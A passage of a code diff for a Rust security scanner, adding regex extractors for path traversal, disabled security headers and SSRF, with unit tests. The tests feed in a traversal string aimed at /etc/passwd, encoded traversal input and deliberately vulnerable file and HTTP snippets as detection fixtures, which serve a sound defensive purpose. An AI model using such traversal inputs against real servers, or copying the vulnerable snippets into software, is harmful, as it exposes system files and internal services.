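A parameterized call such as `User.objects.raw("SELECT ... WHERE id = ?", [user_id])` is not flagged because its first argument is a plain string literal.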


@ -0,0 +1,348 @@
//! Path traversal vulnerability extractor.
//!
//! Detects patterns where file system operations use user-controlled input
//! without proper validation, which can lead to directory traversal attacks.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for path traversal vulnerabilities.
///
/// Detects patterns indicating unsafe file path handling:
/// - File operations with user-controlled input
/// - Path.join/filepath.Join with request parameters
/// - sendFile/res.download with user input
/// - Direct traversal literals (../ or %2e%2e)
pub struct PathTraversalExtractor {
// Python patterns
python_open_user: Regex,
python_path_join: Regex,
// JavaScript/TypeScript patterns
js_fs_user: Regex,
js_path_join: Regex,
js_sendfile: Regex,
// Go patterns
go_filepath: Regex,
// Rust patterns
rust_path_user: Regex,
// Universal patterns
traversal_literal: Regex,
}
impl Default for PathTraversalExtractor {
fn default() -> Self {
Self::new()
}
}
impl PathTraversalExtractor {
/// Create a new path traversal extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: file ops with user input
python_open_user: Regex::new(
r#"(?:open|read|write)\s*\([^)]*(?:request\.|params\[|input|user)"#,
)
.expect("valid regex"),
python_path_join: Regex::new(
r#"os\.path\.join\s*\([^)]*(?:request\.|params\[|input|user)"#,
)
.expect("valid regex"),
// JavaScript: fs/path with user input
js_fs_user: Regex::new(
r#"fs\.(?:readFile|writeFile|createReadStream|readFileSync|writeFileSync)\s*\([^)]*(?:req\.|params\.|query\.)"#,
)
.expect("valid regex"),
js_path_join: Regex::new(
r#"path\.(?:join|resolve)\s*\([^)]*(?:req\.|params\.|query\.)"#,
)
.expect("valid regex"),
js_sendfile: Regex::new(r#"res\.(?:sendFile|download)\s*\([^)]*(?:req\.|params\.)"#)
.expect("valid regex"),
// Go: filepath with user input
go_filepath: Regex::new(
r#"(?:filepath\.Join|os\.Open|os\.ReadFile|ioutil\.ReadFile)\s*\([^)]*(?:r\.|req\.|c\.)"#,
)
.expect("valid regex"),
// Rust: path operations with user input
rust_path_user: Regex::new(
r#"(?:Path::new|PathBuf::from|std::fs::read|std::fs::write)\s*\([^)]*(?:request|params|query|user)"#,
)
.expect("valid regex"),
// Universal: direct traversal literals
traversal_literal: Regex::new(r#"\.\.[\\/]|%2e%2e|%2E%2E"#).expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["filesystem", "path", category],
"user_controlled_path",
ObjectValue::Boolean(true),
file,
line,
matched,
0.85,
description,
)
}
}
impl Extractor for PathTraversalExtractor {
fn name(&self) -> &str {
"path_traversal"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Rust,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for traversal literals in any language
if let Some(m) = self.traversal_literal.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"traversal",
"Path contains directory traversal sequence (../)",
));
}
// Language-specific patterns
match language {
Language::Python => {
if let Some(m) = self.python_open_user.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"File operation with user-controlled path (path traversal risk)",
));
}
if let Some(m) = self.python_path_join.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"path_construction",
"os.path.join with user input (path traversal risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
if let Some(m) = self.js_fs_user.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"fs operation with user-controlled path (path traversal risk)",
));
}
if let Some(m) = self.js_path_join.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"path_construction",
"path.join/resolve with user input (path traversal risk)",
));
}
if let Some(m) = self.js_sendfile.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_serving",
"res.sendFile/res.download with user input (path traversal risk)",
));
}
}
Language::Go => {
if let Some(m) = self.go_filepath.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"Filepath operation with user input (path traversal risk)",
));
}
}
Language::Rust => {
if let Some(m) = self.rust_path_user.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"file_operation",
"Path operation with user input (path traversal risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_open_user_input() {
let extractor = PathTraversalExtractor::new();
let content = r#"
file = open(request.GET['filename'], 'r')
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("filesystem/path"));
}
#[test]
fn test_python_path_join() {
let extractor = PathTraversalExtractor::new();
let content = r#"
path = os.path.join(base_dir, request.args['file'])
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "app.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_fs_read() {
let extractor = PathTraversalExtractor::new();
let content = r#"
fs.readFileSync(req.query.file);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_sendfile() {
let extractor = PathTraversalExtractor::new();
let content = r#"
res.sendFile(req.params.filename);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_filepath() {
let extractor = PathTraversalExtractor::new();
let content = r#"
path := filepath.Join(baseDir, r.URL.Query().Get("file"))
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_traversal_literal() {
let extractor = PathTraversalExtractor::new();
let content = r#"
path := "../../../etc/passwd"
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("traversal sequence"));
}
#[test]
fn test_encoded_traversal() {
let extractor = PathTraversalExtractor::new();
let content = r#"
url := "%2e%2e%2fconfig"
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "main.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_safe_path() {
let extractor = PathTraversalExtractor::new();
// Safe: no user input
let content = r#"
fs.readFileSync('./config.json');
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "app.js");
assert!(claims.is_empty());
}
}
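
Review note on the universal traversal check above: it scans each line and reports 1-based line numbers for any `../`, `..\` or percent-encoded `%2e%2e` sequence. A minimal std-only sketch of that scan follows. The function name `find_traversal_lines` is hypothetical, and unlike the `traversal_literal` regex, which accepts only all-lowercase or all-uppercase encodings, this version lowercases the line first and so also catches mixed case such as `%2E%2e`.

```rust
/// Hypothetical helper (not part of the extractor): returns the 1-based line
/// numbers of lines that contain a directory traversal sequence.
fn find_traversal_lines(content: &str) -> Vec<usize> {
    content
        .lines()
        .enumerate()
        .filter(|(_, line)| {
            // Lowercase once so the percent-encoded form matches in any case.
            let lower = line.to_ascii_lowercase();
            line.contains("../") || line.contains("..\\") || lower.contains("%2e%2e")
        })
        // `enumerate` is 0-based; reported line numbers are 1-based.
        .map(|(idx, _)| idx + 1)
        .collect()
}
```

As with the extractor, a hit only says that a traversal sequence appears in the source text. It does not show that user input reaches a file operation.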


@ -13,9 +13,14 @@ use super::dep_versions::DepVersionsExtractor;
use super::hardcoded_secrets::HardcodedSecretsExtractor;
use super::high_entropy::HighEntropySecretsExtractor;
use super::insecure_cookies::InsecureCookiesExtractor;
use super::insecure_deserialization::InsecureDeserializationExtractor;
use super::jwt_config::JwtConfigExtractor;
use super::orm_injection::OrmInjectionExtractor;
use super::path_traversal::PathTraversalExtractor;
use super::rate_limit::RateLimitExtractor;
use super::security_headers::SecurityHeadersExtractor;
use super::sql_injection::SqlInjectionExtractor;
use super::ssrf::SsrfExtractor;
use super::timeout_config::{TimeoutConfigExtractor, TimeoutThresholds};
use super::tls_verify::TlsVerifyExtractor;
use super::tls_version::TlsVersionExtractor;
@ -23,7 +28,10 @@ use super::traits::Extractor;
use super::unreal_config::UnrealConfigExtractor;
use super::unreal_cpp::UnrealCppExtractor;
use super::unreal_performance::UnrealPerformanceExtractor;
use super::unvalidated_redirects::UnvalidatedRedirectsExtractor;
use super::weak_crypto::WeakCryptoExtractor;
use super::weak_password::WeakPasswordExtractor;
use super::xxe::XxeExtractor;
/// Registry of available extractors.
pub struct ExtractorRegistry {
@ -116,6 +124,31 @@ impl ExtractorRegistry {
if is_enabled("insecure_cookies") {
extractors.push(Box::new(InsecureCookiesExtractor::new()));
}
// Phase 8: Enterprise security extractors
if is_enabled("path_traversal") {
extractors.push(Box::new(PathTraversalExtractor::new()));
}
if is_enabled("unvalidated_redirects") {
extractors.push(Box::new(UnvalidatedRedirectsExtractor::new()));
}
if is_enabled("weak_password") {
extractors.push(Box::new(WeakPasswordExtractor::new()));
}
if is_enabled("security_headers") {
extractors.push(Box::new(SecurityHeadersExtractor::new()));
}
if is_enabled("insecure_deserialization") {
extractors.push(Box::new(InsecureDeserializationExtractor::new()));
}
if is_enabled("ssrf") {
extractors.push(Box::new(SsrfExtractor::new()));
}
if is_enabled("orm_injection") {
extractors.push(Box::new(OrmInjectionExtractor::new()));
}
if is_enabled("xxe") {
extractors.push(Box::new(XxeExtractor::new()));
}
// Register declarative extractors from config
// Declarative extractors are always enabled unless explicitly disabled.
@ -199,7 +232,7 @@ mod tests {
use crate::extractors::declarative::{DeclarativeClaimDef, DeclarativeValue};
/// Number of built-in extractors (not counting declarative).
const BUILTIN_EXTRACTOR_COUNT: usize = 17;
const BUILTIN_EXTRACTOR_COUNT: usize = 25;
#[test]
fn test_registry_creation() {


@ -0,0 +1,359 @@
//! Missing security headers extractor.
//!
//! Detects patterns where security headers are explicitly disabled or
//! configured insecurely.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for missing or disabled security headers.
///
/// Detects patterns indicating insecure header configurations:
/// - X-Frame-Options disabled or set to ALLOWALL
/// - X-Content-Type-Options disabled
/// - X-XSS-Protection disabled
/// - HSTS disabled
/// - Content-Security-Policy disabled
pub struct SecurityHeadersExtractor {
// Explicit header disabled
header_disabled: Regex,
// Django security settings explicitly disabled (False or 0)
django_missing: Regex,
// YAML headers disabled
yaml_disabled: Regex,
// Frame options ALLOWALL
frame_allowall: Regex,
// CSP disabled or unsafe
csp_unsafe: Regex,
// HSTS disabled
hsts_disabled: Regex,
}
impl Default for SecurityHeadersExtractor {
fn default() -> Self {
Self::new()
}
}
impl SecurityHeadersExtractor {
/// Create a new security headers extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Explicit header disabled in various formats
header_disabled: Regex::new(
r#"(?i)(?:X-Frame-Options|X-Content-Type-Options|X-XSS-Protection)\s*[:=]\s*["']?(?:none|disabled?|false|off)["']?"#,
)
.expect("valid regex"),
// Django SECURE_* settings explicitly set to False or 0
django_missing: Regex::new(
r#"(?i)SECURE_(?:BROWSER_XSS_FILTER|CONTENT_TYPE_NOSNIFF|HSTS_SECONDS|SSL_REDIRECT)\s*=\s*(?:False|0)"#,
)
.expect("valid regex"),
// YAML headers disabled
yaml_disabled: Regex::new(
r#"(?i)(?:x_frame_options|xss_protection|content_type_nosniff|hsts)\s*:\s*(?:false|no|disabled?|off)"#,
)
.expect("valid regex"),
// Frame options ALLOWALL (dangerous)
frame_allowall: Regex::new(r#"(?i)X-Frame-Options\s*[:=]\s*["']?ALLOWALL"#)
.expect("valid regex"),
// CSP disabled or using unsafe-inline/unsafe-eval
csp_unsafe: Regex::new(
r#"(?i)(?:Content-Security-Policy|CSP)\s*[:=]\s*["']?(?:none|disabled?|.*unsafe-(?:inline|eval))"#,
)
.expect("valid regex"),
// HSTS disabled or set to 0
hsts_disabled: Regex::new(
r#"(?i)(?:Strict-Transport-Security|HSTS|hsts_seconds)\s*[:=]\s*(?:["']?(?:none|disabled?|false|off)["']?|0)"#,
)
.expect("valid regex"),
}
}
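/// Build a claim for `header` under the `http` / `security_headers` path.
///
/// The recorded value is always `disabled`, including for ALLOWALL and
/// unsafe-CSP matches.
fn make_claim(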
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
header: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["http", "security_headers", header],
"header_status",
ObjectValue::Text("disabled".to_string()),
file,
line,
matched,
0.8,
description,
)
}
}
impl Extractor for SecurityHeadersExtractor {
fn name(&self) -> &str {
"security_headers"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Yaml,
Language::Json,
Language::Toml,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
_language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for explicitly disabled headers
if let Some(m) = self.header_disabled.find(line) {
let header = if line.to_lowercase().contains("frame") {
"x_frame_options"
} else if line.to_lowercase().contains("content-type") {
"x_content_type_options"
} else {
"x_xss_protection"
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
header,
"Security header explicitly disabled",
));
}
// Check Django secure settings
if let Some(m) = self.django_missing.find(line) {
let header = if line.to_lowercase().contains("xss") {
"x_xss_protection"
} else if line.to_lowercase().contains("nosniff") {
"x_content_type_options"
} else if line.to_lowercase().contains("hsts") {
"hsts"
} else {
"ssl_redirect"
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
header,
"Django security setting disabled",
));
}
// Check YAML disabled patterns
if let Some(m) = self.yaml_disabled.find(line) {
let header = if line.to_lowercase().contains("frame") {
"x_frame_options"
} else if line.to_lowercase().contains("xss") {
"x_xss_protection"
} else if line.to_lowercase().contains("nosniff") {
"x_content_type_options"
} else {
"hsts"
};
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
header,
"Security header disabled in configuration",
));
}
// Check for dangerous X-Frame-Options ALLOWALL
if let Some(m) = self.frame_allowall.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"x_frame_options",
"X-Frame-Options set to ALLOWALL (clickjacking risk)",
));
}
// Check for CSP unsafe patterns
if let Some(m) = self.csp_unsafe.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"content_security_policy",
"Content-Security-Policy disabled or uses unsafe directives",
));
}
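// Check for HSTS disabled.
// Note: `SECURE_HSTS_SECONDS = 0` matches both this pattern and
// `django_missing`, so that line yields two claims.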
if let Some(m) = self.hsts_disabled.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"hsts",
"Strict-Transport-Security (HSTS) disabled",
));
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_header_disabled() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
X-Frame-Options: none
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "nginx.conf");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("security_headers"));
}
#[test]
fn test_django_missing() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
SECURE_BROWSER_XSS_FILTER = False
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("Django"));
}
#[test]
fn test_yaml_disabled() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
x_frame_options: false
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_frame_allowall() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
X-Frame-Options = "ALLOWALL"
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Toml, "config.toml");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("clickjacking"));
}
#[test]
fn test_csp_unsafe() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
Content-Security-Policy: script-src 'unsafe-inline'
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("content_security_policy"));
}
#[test]
fn test_hsts_disabled() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
Strict-Transport-Security: none
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("hsts"));
}
#[test]
fn test_hsts_zero() {
let extractor = SecurityHeadersExtractor::new();
let content = r#"
HSTS_SECONDS = 0
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
// Should detect hsts_disabled pattern (HSTS_SECONDS = 0); django_missing
// does not fire because the SECURE_ prefix is absent
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_enabled() {
let extractor = SecurityHeadersExtractor::new();
// Safe: headers enabled
let content = r#"
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
SECURE_BROWSER_XSS_FILTER = True
"#;
let claims =
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
assert!(claims.is_empty());
}
}
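
The line-by-line scan used by `SecurityHeadersExtractor::extract` can be sketched without the `regex` crate. This is a minimal, standard-library-only illustration, not the extractor itself: `Finding`, `HEADERS`, `DISABLING`, and `scan_disabled_headers` are hypothetical names, exact string comparison stands in for the `header_disabled` regex, and only the three `X-*` headers are covered. It shows the 1-based line numbering and lowercases each line once rather than once per check.

```rust
/// Hypothetical, simplified stand-in for `ExtractedClaim`.
#[derive(Debug, PartialEq)]
pub struct Finding {
    /// 1-based line number, matching `line_idx + 1` in the extractor.
    pub line: usize,
    /// Normalized header key, e.g. "x_frame_options".
    pub header: &'static str,
}

/// (lowercase header name, normalized key) pairs. Assumed for this sketch.
const HEADERS: [(&str, &str); 3] = [
    ("x-frame-options", "x_frame_options"),
    ("x-content-type-options", "x_content_type_options"),
    ("x-xss-protection", "x_xss_protection"),
];

/// Values treated as "header turned off". Assumed for this sketch.
const DISABLING: [&str; 5] = ["none", "disabled", "disable", "false", "off"];

/// Scan `content` line by line and report headers set to a disabling value.
pub fn scan_disabled_headers(content: &str) -> Vec<Finding> {
    let mut findings = Vec::new();
    for (line_idx, line) in content.lines().enumerate() {
        // Lowercase once per line; every comparison below reuses it.
        let lower = line.to_lowercase();
        for &(name, key) in HEADERS.iter() {
            let pos = match lower.find(name) {
                Some(pos) => pos,
                None => continue,
            };
            // Expect `:` or `=` after the header name, as the regex does.
            let rest = lower[pos + name.len()..].trim_start();
            let value = match rest.strip_prefix(':').or_else(|| rest.strip_prefix('=')) {
                Some(value) => value,
                None => continue,
            };
            // Drop surrounding whitespace and optional quotes.
            let value = value.trim().trim_matches(|c: char| c == '"' || c == '\'');
            if DISABLING.contains(&value) {
                findings.push(Finding { line: line_idx + 1, header: key });
            }
        }
    }
    findings
}
```

Unlike the regex, this sketch compares the whole value, so a value such as `offline` would not be reported.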

@ -0,0 +1,393 @@
//! Server-Side Request Forgery (SSRF) vulnerability extractor.
//!
//! Detects patterns where HTTP requests are made with user-controlled URLs,
//! which can allow attackers to access internal services or exfiltrate data.
use regex::Regex;
use stemedb_core::types::ObjectValue;
use super::traits::{build_claim, Extractor};
use crate::types::{ExtractedClaim, Language};
/// Extractor for SSRF vulnerabilities.
///
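/// Detects patterns indicating unsafe URL handling in HTTP requests:
/// - HTTP client calls (requests, urllib, httpx, fetch, axios, got, net/http,
/// reqwest) with an argument that looks like a variable or request field
/// - Webhook/callback URLs assigned from user input
/// - Image/proxy URLs assigned from request parameters
///
/// Matching is name-based (for example `url`, `uri`, `target`, `endpoint`,
/// `request.`), so a variable named `url` is flagged even when its value is
/// not user-controlled.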
pub struct SsrfExtractor {
// Python patterns
python_requests: Regex,
python_urllib: Regex,
python_httpx: Regex,
// JavaScript/TypeScript patterns
js_fetch: Regex,
js_axios: Regex,
js_got: Regex,
// Go patterns
go_http: Regex,
// Rust patterns
rust_reqwest: Regex,
// Common sink patterns (all languages)
ssrf_sink: Regex,
}
impl Default for SsrfExtractor {
fn default() -> Self {
Self::new()
}
}
impl SsrfExtractor {
/// Create a new SSRF extractor with compiled regexes.
///
/// # Panics
/// Panics if any regex pattern is invalid (programmer error).
#[allow(clippy::expect_used)]
pub fn new() -> Self {
Self {
// Python: requests with user URL
python_requests: Regex::new(
r#"requests\.(?:get|post|put|delete|head|patch|request)\s*\(\s*(?:url|uri|target|endpoint|request\.)"#,
)
.expect("valid regex"),
python_urllib: Regex::new(
r#"urllib\.request\.(?:urlopen|Request)\s*\(\s*(?:url|uri|request\.)"#,
)
.expect("valid regex"),
python_httpx: Regex::new(
r#"httpx\.(?:get|post|put|delete|AsyncClient)\s*\([^)]*(?:url|uri|request\.)"#,
)
.expect("valid regex"),
// JavaScript: fetch with user URL
// (`\b` keeps names such as `prefetch(` from matching)
js_fetch: Regex::new(
r#"\bfetch\s*\(\s*(?:url|uri|target|endpoint|req\.(?:query|params|body)\.)"#,
)
.expect("valid regex"),
js_axios: Regex::new(
r#"axios\.(?:get|post|put|delete|request)\s*\(\s*(?:url|uri|target|endpoint)"#,
)
.expect("valid regex"),
// `\b` keeps names such as `forgot(` from matching
js_got: Regex::new(
r#"\bgot\s*\(\s*(?:url|uri|target|endpoint)"#,
)
.expect("valid regex"),
// Go: http.Get with user URL
go_http: Regex::new(
r#"http\.(?:Get|Post|Head|PostForm|NewRequest)\s*\(\s*(?:url|uri|target|endpoint|r\.)"#,
)
.expect("valid regex"),
// Rust: reqwest with user URL
rust_reqwest: Regex::new(
r#"reqwest::(?:get|Client).*\(\s*(?:url|&url|format!|user)"#,
)
.expect("valid regex"),
// Common sink patterns - URLs that look user-controlled
ssrf_sink: Regex::new(
r#"(?i)(?:proxy_url|image_url|webhook_url|callback_url|redirect_url|target_url|remote_url|external_url)\s*[:=]\s*(?:request\.|params\.|req\.Query)"#,
)
.expect("valid regex"),
}
}
fn make_claim(
path_segments: &[String],
file: &str,
line: usize,
matched: &str,
category: &str,
description: &str,
) -> ExtractedClaim {
build_claim(
path_segments,
&["network", "ssrf", category],
"request_url_source",
ObjectValue::Text("user_controlled".to_string()),
file,
line,
matched,
0.85,
description,
)
}
}
impl Extractor for SsrfExtractor {
fn name(&self) -> &str {
"ssrf"
}
fn languages(&self) -> &[Language] {
&[
Language::Python,
Language::JavaScript,
Language::TypeScript,
Language::Go,
Language::Rust,
]
}
fn extract(
&self,
path_segments: &[String],
content: &str,
language: Language,
file: &str,
) -> Vec<ExtractedClaim> {
let mut claims = Vec::new();
for (line_idx, line) in content.lines().enumerate() {
let line_num = line_idx + 1;
// Check for common sink patterns (all languages)
if let Some(m) = self.ssrf_sink.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"url_sink",
"URL variable populated from user input (SSRF risk)",
));
}
// Language-specific patterns
match language {
Language::Python => {
if let Some(m) = self.python_requests.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"requests library with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.python_urllib.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"urllib with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.python_httpx.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"httpx with user-controlled URL (SSRF risk)",
));
}
}
Language::JavaScript | Language::TypeScript => {
if let Some(m) = self.js_fetch.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"fetch with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.js_axios.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"axios with user-controlled URL (SSRF risk)",
));
}
if let Some(m) = self.js_got.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"got with user-controlled URL (SSRF risk)",
));
}
}
Language::Go => {
if let Some(m) = self.go_http.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"http.Get/Post with user-controlled URL (SSRF risk)",
));
}
}
Language::Rust => {
if let Some(m) = self.rust_reqwest.find(line) {
claims.push(Self::make_claim(
path_segments,
file,
line_num,
m.as_str(),
"http_client",
"reqwest with user-controlled URL (SSRF risk)",
));
}
}
_ => {}
}
}
claims
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_python_requests() {
let extractor = SsrfExtractor::new();
let content = r#"
response = requests.get(url)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "api.py");
assert_eq!(claims.len(), 1);
assert!(claims[0].concept_path.contains("network/ssrf"));
}
#[test]
fn test_python_requests_user_input() {
let extractor = SsrfExtractor::new();
let content = r#"
response = requests.post(request.json['webhook_url'], data=payload)
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_python_urllib() {
let extractor = SsrfExtractor::new();
let content = r#"
data = urllib.request.urlopen(url).read()
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "fetch.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_fetch() {
let extractor = SsrfExtractor::new();
let content = r#"
const data = await fetch(url);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_js_axios() {
let extractor = SsrfExtractor::new();
let content = r#"
const response = await axios.get(url);
"#;
let claims =
extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_go_http() {
let extractor = SsrfExtractor::new();
let content = r#"
resp, err := http.Get(url)
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "client.go");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_rust_reqwest() {
let extractor = SsrfExtractor::new();
let content = r#"
let body = reqwest::get(url).await?.text().await?;
"#;
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "client.rs");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_ssrf_sink_pattern() {
let extractor = SsrfExtractor::new();
let content = r#"
proxy_url = req.Query("proxy")
"#;
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "proxy.go");
assert_eq!(claims.len(), 1);
assert!(claims[0].description.contains("URL variable"));
}
#[test]
fn test_webhook_url_sink() {
let extractor = SsrfExtractor::new();
let content = r#"
webhook_url = request.json.get('callback')
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");
assert_eq!(claims.len(), 1);
}
#[test]
fn test_no_false_positives_hardcoded() {
let extractor = SsrfExtractor::new();
// Safe: hardcoded URL
let content = r#"
response = requests.get("https://api.example.com/data")
"#;
let claims =
extractor.extract(&["python".to_string()], content, Language::Python, "api.py");
assert!(claims.is_empty());
}
}
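
The distinction the SSRF tests rely on (a call whose first argument is a name such as `url` is flagged, a call with a string literal is not) can be illustrated without regexes. The following is a rough sketch under stated assumptions: `FirstArg` and `classify_first_arg` are hypothetical helpers, not part of the extractor, and the check looks only at the first character of the first argument.

```rust
/// What the first argument of a call expression looks like.
#[derive(Debug, PartialEq)]
pub enum FirstArg {
    /// Starts with a quote, e.g. "https://api.example.com/data".
    Literal,
    /// Starts with a letter or underscore, e.g. `url` or `request.json[...]`.
    Identifier,
    /// Anything else, or the callee was not found on the line.
    Other,
}

/// Classify the first argument of `callee(...)` on a single source line.
pub fn classify_first_arg(line: &str, callee: &str) -> FirstArg {
    // Locate the callee, e.g. "requests.get".
    let after = match line.find(callee) {
        Some(pos) => &line[pos + callee.len()..],
        None => return FirstArg::Other,
    };
    // Require an opening parenthesis, allowing whitespace before it.
    let args = match after.trim_start().strip_prefix('(') {
        Some(rest) => rest.trim_start(),
        None => return FirstArg::Other,
    };
    match args.chars().next() {
        Some('"') | Some('\'') => FirstArg::Literal,
        Some(c) if c.is_alphabetic() || c == '_' => FirstArg::Identifier,
        _ => FirstArg::Other,
    }
}
```

A first-character check like this shares the main limitation of the name-based regexes: it says nothing about where the value came from, so an `Identifier` result is a hint for review rather than proof of user control.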

@ -37,6 +37,18 @@ pub struct TlsVersionExtractor {
// Config file patterns (YAML, TOML, JSON)
config_min_version: Regex,
// Semantic patterns (variable name suggests TLS + value is deprecated)
semantic_tls_version: Regex,
// Environment variable patterns
env_tls_version: Regex,
// Terraform HCL patterns
terraform_tls: Regex,
// Kubernetes camelCase patterns (YAML)
k8s_tls: Regex,
}
impl Default for TlsVersionExtractor {
@ -89,6 +101,40 @@ impl TlsVersionExtractor {
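// The value must not be followed by a word character or dot, so "TLSv1.2" is not matched as "TLSv1"
r#"(?i)(?:min_version|tls_min_version|minimum_tls_version|ssl_min_version)\s*[:=]\s*["']?(?:1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?3)?|TLS10|TLS11)(?:[^\w.]|$)"#,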
)
.expect("valid regex"),
// Semantic: variable name contains tls/ssl and min/version in any order
